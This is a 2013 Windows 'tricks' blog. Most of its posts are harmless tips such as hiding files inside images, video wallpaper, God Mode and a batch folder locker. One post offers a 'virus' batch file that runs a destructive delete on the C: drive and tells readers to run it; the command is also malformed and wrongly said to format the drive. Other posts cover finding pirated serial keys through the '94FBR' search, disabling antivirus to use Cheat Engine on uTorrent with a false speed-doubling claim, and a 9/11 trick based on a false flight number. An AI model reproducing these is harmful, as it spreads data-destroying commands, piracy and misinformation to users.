Σελίδες

Τετάρτη 15 Μαΐου 2013

Hide files behind images


There are some important  files or document you want to hide from others on your computer. To do that you might be creating folder inside folder to hide such files but in todays tutorial i will change this by teaching you a interesting trick to hide files behind images.To hide a file behind a image  means that if any one opens that image he will see the image, but to see the hidden file we need to open that image in a specific way. So lets get started.

How To Hide File Behind Image ?

In order to do this you should have basic understanding of command line, but if you don't know check out  tutorial given below.
1. Select an image to be used for hiding file behind the image.
2. Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.
3. And most important is that paste both the files on desktop. You may do this anywhere instead of desktop if you have some basic understanding of command line.
4. Now open cmd by going to Start > Accessories Command Prompt and type following commands in it.
cd desktop
hide files behind images

5. CD stands for change directory by typing above command you change your directory to desktop. After that type command given below.
 Copy /b imagename.jpg + filename.rar finalimage.jpg
hide files behind images
  • Replace imagename.jpg with the name of image you want your file to be hidden behind. Don't forget to add image format (Eg: .jpg,.png,.gif)
  • Replace filename with name of your file you want to hide. It must be in .rar format.
  • Finally Replace finalimage.jpg with whatever name you want your final image with hidden files should be. This is the image where your file will be hidden.
6. Now when you will try to open this newly created image it will open as normal image, but to open you hidden file you need follow steps given below.

How To Access Hidden File ?

To access your hidden file you need to open the newly created image in winrar. Just follow simple steps given below to do that.

    1. Open winrar
    2. Now locate your image and open it or simply drag your image in winrar.
    3. Extract the file and done.

Δευτέρα 13 Μαΐου 2013

How to set video as desktop wallpaper


How to set video as desktop wallpaper ?

   1. Open VLC Media Player. If you don't have it download it frome Here.
   2. Then Go to Tools > Preference Or press CTRL + P and Selecet Video from left panel
   3. Then Choose DirectX video output from output dropdown list
      as shown in below image .
Video wallpaper

   4. Save the changes ans restart VLC Media Player.
   5. Play any video you would like to set as your desktop wallpaper.
   6. Then click on Video and select DirectX Wallpaper from the dropdown list as show in below image.
Video wallpaper


   7. Now Minimize vlc player and you will see your video running on your desktop as wallpaper.
   8. If you want your default wallpaper back then uncheck DirectX Wallpaper from video dropdown list.
   9. Hope you like this simple trick share your thought about this trick in comment section.

5 cool Notepad tricks



1. World Trade Center Attack Trick

world trade center trick


The flight number of the plane that had hit World Trade Center on  (9/11) was Q33NY. Now we call this trick or a coincidence or something else but whatever it is you will be definately amazed by the this trick.

    1. Open Notepad and Type “Q33N” (without quotes) in capital letters.
    2. Increase the font size to 72.
    3. Change the Font to Wingdings.

2. Matrix Effect Trick

matrix effect trick
In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.

    1. Open Noteapad and copy below code into it.

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

    2. Now save this file as Matrix.bat (name can be anything but .bat is must)
    3. Open your saved file and you will have matrix effect on your screen.

3. Creating Virus That Format C Drive

In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

    1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y
  
    2. Then Save this file as virus.bat
    3. Now, running this file format C Drive.

4. Making Personal Diary Using Notepad 

notepad tricks
Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.

    1. Open Notepad and Type .LOG (in capital Letters and press enter
    2. Save the program with any name and close it.
    3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad

5. Dancing Keyboard Led


keyboard dancing led

In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script.

    1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
    2. Then save this file as dance.vbs (name can be anything but .vbs is must)
    3. Open your save file and see your keyboard led blinking like disco lights.

Κυριακή 12 Μαΐου 2013

God mode in windows 7,vista

In this tutorial i will show you to enable God Mode in Windows 7 and Windows Vista. By enabling God mode you can access all your windows setting from one folder and it makes really easy to access and change windows settings. This work 32 as well as 64 bit operating system. So lets enable God mode on your computer.

How to do it ?

  1. On your desktop right click and create a New Folder.
  2. Rename this folder to the code given below.

GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

  3. Done now double click on this folder and you will have access to all your windows operating system settings. 

Video Tutorial On Enabling God Mode




How to watch +18 youtube videos without sign up

Sometime its annoying when youtube ask you to sign in for your age verification to watch 18+ videos. So i will make it easy for you by showing you a simple youtube trick to watch adult or 18+ youtube videos without signing In. This trick is 100% working as of 2013. So lets get started.

How To Watch 18+ Youtube Videos Without Logging In ?

1. First get the Url of video you want to watch. As shown below.
http://www.youtube.com/watch?v=4Xkh6j7RMqk 
2. Then copy the Video Id. For above link video Id is 4Xkh6j7RMqk
3. Now paste the Video Id in the link given below.
http://www.youtube.com/v/VideoId?fs=1
  • Replace VideoId with the Id you copied in Step 2
4. Now the url will become as shown below.
http://www.youtube.com/v/4Xkh6j7RMqk?fs=1
5. Done.

Disabling right click on your blog


If you own a blog or a website then you always want to prevent other malicious bloggers from copying the content from your blog. You might have written an article with great efforts and lots of research and other just copy/paste it on their blog. To prevent such users from copying content from your blog i will show you Javascript Trick to disable right click on your blog. So lets get started.

How To Disable Right Click On Your Blog ?

 1. Got to your blogger Dashboard and then Click on Layout.
blogger widget

 2. Now Click on Add Gadget and select Html/Javascript.
blogger widget
 3. Now paste code given below in the pop up window.


<!--Code End http://mybloggersworld.blogspot.in>
 4. Save it and done. Now users will not be able to right click on your website.  5. If you like to disable mouse on your computer then check out tutorial given below.

How to find serial key for any softaware using google search


Most of you download and use pirated software from torrents or any such other sites, but sometime it gets very difficult to find serial key of those softwares. I will make it easy for you by showing you simple yet very intersting google trick which will allow you to find serial key of any software very easily.

How To Find Serial Key Of Any Software ?

The key 94FBR is a part of  Office 2000 Pro CD activation key that is widely distributed as it bypasses the activation requirements of Office 2000 Pro. By searching for 94fbr and the product name, you are guarantee that the pages that are returned are pages dealing specifically with the product you're wanting a serial for. Follow simple steps given below to learn this trick

    1. Go to Google
    2. Then type  Software Name 94FBR
  • Replace Software Name with the name of software whose serial key you want to find
  • Eg: To find serial key of Nero i will type Nero 94fbr
    3. Now press Enter and you will find serial key of software you are looking for as shown below.
google trick to find serial key

Block Facebook on your computer easy


How To Use Facebook Blocker ? 

 1. First download Facebook Blocker by Clicking Here
  2. Extract the file and right click on Facebook Blocker.exe and run it as administator(Important)
  3. Press 1 in order to  backup your host file to be on the safe side.
facebook blocker
  4. Now Press 2 to block facebook
  5. Its time to check if facebook is blocked or not to do that Press 5
  6. Hope this help you if you have any question leave a comment below.

How to lock folders


In this tutorial i will show you interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7). Follow below tutorial to learn this trick.

How To Lock Folder ?

   1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is coolhacks)
  • To change the password replace coolhacks with  new password in the above code

How To Further Secure ?

You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

Παρασκευή 10 Μαΐου 2013

How to make your pc boost faster




1. Take a moment to defrag

To improve performance in applications, including booting, is to make sure the drive is defragged. When a drive is fragmented, chunks of each file are scattered so in order to read them, the hdd's read/write head has to jump all over the platters wich takes time. By defragging, your files are arranged in sequential order. Use any defragmentation utility like Diskeeper.

2. Clean the rest of the startup folders

To find which apps are loading every startup, click Start, Run then type MSCONFIG, then click the startup tab. Every item in this tab checked runs every time you boot, so cleaning the list will shave your boot time especially on systems with tons of apps. Anything having to do with your display, antivirus or spyware utilities can stay. If you dont know something, it is better to leave it be. If you are sure it is junk, delete it.



3. Prefetch (For Windows XP only)

Whenever you run a program or open a file, Windows will add bits of the file to the prefetch folder on your harddrive so the next time you open that app, Windows can deliver it to you faster. Sometimes Windows prefetches items you do not need, sucking system resources. You can see what Windows is prefetching by going to C:\Windows\Prefetch. Go to the prefetch folder by clicking start, run and type prefetch. Delete all files that are there. Next, open Regedit then navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters. Look for the “EnablePrefetcher” in the right side pane. Right click & click Modify. If you change the value to 2, it will prefetch only boot items. Type in 3 and it will prefetch apps and boot items. I recommend typing 2. Close Regedit then restart your computer to save your changes.

(Note: Backup this key first before you edit your registry)

4. Disable the splash screen (For Windows XP only)

Every time you boot, you see the same XP splash screen since 2001. Disable this and get a couple seconds of your boot time. To disable, open MSCONFIG, and go to the boot.ini tab. Check the /NOGUIBOOT box, click apply then ok, then restart your pc.
(Note: it will just affect the logo of WinXP on startup, no damage will be made)

5. Tweak your BIOS

The last of relatively simple tweaks will require you to enter your computer's BIOS. To enter it, you must press F2 or DEL key as soon as you turn onyour pc. IF you dont have a floppy drive, it is reccomended to disable your floppy controller. Also. for max boot speed, your hard drive (C:) must be the first boot device. Enable the Quick POST and Fast Boot. Then, disable any unused I/O devices, such as parallel ports, save changes, then reboot your pc.
(remember to backup your old bios settings first)


5. Upgrade your hardware!

If you have gone through all the tweaks listed here, and your machine is still slow, the only way to improve performance is to buy a faster hard drive. Because much of the boot process involve disk reads, a 10,000rpm hard drive will speed things along.

How to double download speed




After trying all the methods available in the internet i was failed to increase uTorrent download speed maybe 1-2kb which is not worth of effort. But lucky me i got a great trick to double your uTorrent speed and this really works. Give it a try i am sure you will not be unhappy.

uTorrent: uTorrent is a software that lets you download files from multiple other people at once. Torrent technology is often faster than other forms of downloading since each user gives different parts of the same file to everyone else downloading the file. To increase the speed more just you need to do a few steps.

To start/perform this trick you have to download and install a software. Find the link below:






Download Cheat Engine 6.1


Your anti-virus may give warning just ignore that or you may have to turn off your anti-virus to download/install this software.

Install it.


Current/Before Trick uTorrent Speed:




Now run Cheat Engine and uTorrent both.

In Cheat Engine you will find one computer icon.



Click on this and now you will find one process list select uTorrent from the process list and click open.



Now again click the computer icon and select the uTorrent process and
under open you will get one option "Attach debugger to process". Click on it.


Now you will get one confirmation box. Click yes.



Now on Cheat Engine check the option "Enable Speedhack".
You will get speed box. Make it 0.5 . Click Apply.




Now Check your speed. It just increased to double.

Note: Don't Close Cheat Engine

How to use your computer remotely



    • 1
      Create an invitation from the host -- the computer you want to control remotely. Click “Start” and “Control Panel.” Type “Remote Settings” in the search bar and press “Enter.” Click “Allow Remote Access to Your Computer.” Ensure that there is a check in the box, and then click “Advanced.”
    • 2
      Choose the length of time for the invitation to stay open, up to 30 days. Click “OK,” and then click “OK” again.
    • 3
      Click “Start” and type “Remote Assistance,” and then press “Enter.”
    • 4
      Click “Invite Someone You Trust to Help You.” Save the invitation as a file and attach it to an email if you use a Web-based client, or use Outlook to automatically attach it.
    • 5
      Email the invitation to an account that you can access from your remote location. The attachment automates the connection process; if you don’t receive the email, you can't control the host computer.
    • 6
      Change your host computer's hibernation and sleep settings, if applicable, via the Control Panel, in Hardware and Sound, under Power Options. If the host computer is hibernating or sleeping when the Remote Assistance request comes from the remote computer, you won’t be able to connect.

    Remote Assistance Connection

    • 7
      Launch your email program or website on the remote computer. Open the email you sent to yourself and the attachment with the invitation. Windows then will automatically launch its Remote Desktop Connection software.
    • 8
      Connect to the host computer and perform your desired tasks. Enter your administrator password to allow changes to your system and to gain access through your computer’s firewall, if needed.
    • 9
      Close the connection only when you've completed all desired tasks, as you won’t be able to reconnect without a new invitation from the host computer. Reconnect using the same process if you accidentally lose the connection on your end; if the connection is lost on the host end, you can't re-establish it.

Tips & Warnings

  • Before you create a Remote Assistance invitation, you have the option to instead choose "Easy Connect," which allows you to bypass the email/attachment step and generate a unique password for remote access.
  • Remote Assistance is already configured to pass through the Windows firewall. If you use a third-party firewall, you need to open TCP/IP port 3389 access to the computer you want to control. Consult the firewall manufacturer for specific instructions.
  • If you have Windows 7 Professional, Enterprise or Ultimate running on your host computer, you can use another tool, Remote Desktop Connection, to control it remotely. However, this tool requires configuring your router.
  • The Remote Assistance tool is designed to facilitate technical support help, and its functionality is limited. To transfer files remotely, for example, you need to connect with Remote Desktop Connection or a third-party connection tool, such as PC Anywhere from Symantec, GoToMyPC, Anyplace Control or RealVNC, which also allow you to log in and out of your home computer without an invitation.